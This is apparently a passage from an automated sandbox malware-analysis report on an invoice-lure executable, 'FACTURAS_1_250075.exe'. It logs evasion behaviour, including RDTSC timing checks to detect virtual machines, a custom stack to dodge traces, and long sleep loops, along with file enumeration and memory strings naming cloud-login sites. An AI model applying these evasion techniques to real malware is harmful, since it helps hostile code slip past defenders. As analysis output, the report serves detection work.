          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeAPI/Special instruction interceptor: Address: 5CDA5F7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeAPI/Special instruction interceptor: Address: 21AA5F7
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeRDTSC instruction interceptor: First address: 5C7C2F8 second address: 5C7C2F8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F31E53984B6h 0x00000006 inc ebp 0x00000007 cmp ax, 0000091Ah 0x0000000b inc ebx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeRDTSC instruction interceptor: First address: 214C2F8 second address: 214C2F8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F31E4E636D6h 0x00000006 inc ebp 0x00000007 cmp ax, 0000091Ah 0x0000000b inc ebx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeMemory allocated: 57B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeMemory allocated: 36090000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeMemory allocated: 35EE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599531Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599422Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598953Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598719Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598609Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598500Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598391Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598281Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598172Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598060Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597953Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597844Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597719Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597609Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597500Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597391Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597281Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597167Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597058Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596953Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596844Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596735Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596625Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596516Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596391Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596266Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596156Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596047Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595931Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595827Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595719Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595601Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595499Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595322Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595184Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595076Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594958Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594844Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeWindow / User API: threadDelayed 8278Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeWindow / User API: threadDelayed 1562Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx3725.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeAPI coverage: 0.4 %
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -28592453314249787s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599891s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7748Thread sleep count: 8278 > 30Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7748Thread sleep count: 1562 > 30Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599641s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599531s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599422s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599313s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599188s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599063s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598953s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598391s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598281s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598172s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598060s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597953s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597391s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597281s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597167s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597058s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596953s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596735s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596625s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596516s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596391s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596266s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596156s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596047s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595931s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595827s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595601s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595499s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595322s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595184s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595076s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594958s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594735s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594610s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594485s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594360s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559B
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_00405FFD FindFirstFileA,FindClose,12_2_00405FFD
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_00402688 FindFirstFileA,12_2_00402688
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,12_2_0040559B
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599531Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599422Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598953Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598719Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598609Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598500Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598391Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598281Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598172Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598060Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597953Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597844Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597719Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597609Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597500Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597391Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597281Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597167Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597058Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596953Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596844Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596735Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596625Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596516Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596391Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596266Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596156Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596047Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595931Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595827Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595719Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595601Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595499Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595322Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595184Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595076Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594958Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594844Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594360Jump to behavior
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.00000000360E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rEqGLI7p5uhNqNCFVrNtQc12HMs0vzinLZc%2FKJbV1jTA%2FzrKnjitar9hXMUGl0dWCYEK0eFc78BMwZRFP1QEMulqXXlhJ%2Fl6vF3iXt5iDycStZ%2BXTjh2r3XVcsKbLpt1HAu7qxFV"}],"group":"cf-nel","max_age":604800}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BB8000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005C0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
